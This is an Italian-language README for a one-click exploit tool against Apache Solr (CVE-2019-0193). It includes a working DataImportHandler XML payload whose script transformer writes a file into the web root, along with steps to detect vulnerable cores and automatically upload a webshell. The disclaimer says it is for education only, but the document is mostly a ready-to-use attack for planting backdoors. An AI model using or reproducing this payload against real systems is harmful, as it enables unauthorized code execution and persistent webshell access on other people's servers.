
ApacheSolrRCE(CVE-2019-0193)per scrivere una shell con un clic, il principio è scrivere un backdoor tramite flusso di file Java eseguito dal codice.
Solo per scopi educativi e di scambio sulla sicurezza informatica, non utilizzare per test o attacchi illegali.
ApacheSolrRCE (CVE-2019-0193) shell in un clic, il principio è quello di scrivere un webshell tramite un flusso di file Java eseguito tramite codice.
Nota: l'autore è piuttosto inesperto, se trovi bug o hai altre esigenze, scarica il codice e modificalo tu stesso.
Poiché i payload diffusi su Internet sono tutti esecuzione di comandi e non è conveniente caricare un webshell, ho scritto questo payload (quando restituisce 123456, significa che la scrittura è riuscita).
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
<script><![CDATA[
function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;
}
]]></script>
<document>
<entity
stream="true"
name="entity1"
datasource="streamsrc1"
processor="XPathEntityProcessor"
rootEntity="true"
forEach="/RDF/item"
transformer="script:poc">
<field column="title" xpath="/RDF/item/title" />
</entity>
</document>
</dataConfig>
Prima fare clic su 'Rilevamento' per ottenere il core e verificare se esiste una vulnerabilità.
Quindi fare clic su 'GetShell' per procedere.
Nota: posiziona il tuo webshell nella directory 'shell', lo strumento caricherà automaticamente il tuo webshell nel menu a discesa.
Il proxy predefinito è HTTP, sulla porta 8080, è hardcoded nel codice; se necessario, compila e modifica da soli.